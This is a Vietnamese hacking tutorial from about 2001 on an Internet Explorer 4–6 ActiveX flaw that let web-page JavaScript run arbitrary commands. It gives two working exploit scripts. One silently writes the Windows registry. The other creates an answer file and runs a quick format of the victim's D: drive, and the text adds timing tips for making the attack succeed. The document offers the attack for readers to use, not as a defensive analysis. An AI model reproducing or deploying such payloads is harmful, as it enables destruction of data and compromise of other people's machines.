Vấn đề:
Tất cả các phiên bản của trình duyệt web thông dụng Internet Explorer từ phiên bản 4.0 cho đến 6.0 đều gặp phải một lỗi rất lớn! Đây là thông tin mà tôi nhận được từ Bugtrap ngày hôm qua(28-07-2001). IE sẽ cho phép chạy bất kì mã lệnh nào được nhúng trong đối tượng com.ms.activeX.ActiveXComponent. Hackers có thể lợi dụng lỗ hỏng bảo mật này để thi hành các mã lệnh nguy hiểm bao gồm cài trojan lên máy nạn nhân, đánh cắp các file hiện có trên máy tính của nạn nhân và thậm chí là còn có thể format luôn cả đĩa cứng của nạn nhân nữa đó:)
Khai thác triệt để lỗ hỏng bảo mật của Internet Explorer (all version)
Bạn hãy xem qua funny (not malicious) javascript sau:
<SCRIPT
Language="JavaScript" type="text/javascript">
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//khởi tạo đối tượng Activex
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
/* thử tạo keys trong registry để thay đổi lại thanh tiêu đề của Internet
Explorer của nạn nhân cho vui:)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window
Title", "Ha ha ha, bạn thấy thế nào!");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window
Title", "Ha ha ha!");
var expdate = new Date((new Date()).getTime() +
(1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
/* delay 1 giây*/
setTimeout("f()", 1000);
}
init();
// -->
</SCRIPT>
Như bạn thấy, javascript thay đổi lại registry của Windows, thế mà IE lại chẵng thông báo gì hết:) Nó cứ âm thầm thực hiện. Tuy nhiên bạn phải nhớ lấy một điều nếu muốn hack thành công IE! Bởi vì IE sẽ tốn vài giây để khởi tại activex nên bạn phải tạo một thời gian trễ từ 1 đến 3 giây bằng lệnh setTimeout cho IE làm việc khởi tạo activex, tốt nhất là 3 giây cho chắc ăn - setTimeout("f()",3000). Sau đó bạn mới có thể tiến hành thi hành các mã lệnh nguy hiểm khác mà bạn đã nhúng trong activex này.
Đây là một javascript rất nguy hiểm, tôi viết để minh họa thêm cho các bạn. Nó sẽ format nhanh như chớp ổ đĩa D:(bạn đừng thử script này trên máy tính của mình!)
<SCRIPT
Language="JavaScript" type="text/javascript">
<!--
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function fd(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
wsh = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
fso = a1.GetObject();
file = fso.CreateTextFile("c:\\y", true);
file.WriteLine("y");
file.WriteLine();
file.Close();
wsh.Run("command /k format d: /q < c:\\y");
}
function init()
{
/* delay 3 giây*/
setTimeout("fd()", 3000);
}
init();
// -->
</SCRIPT>
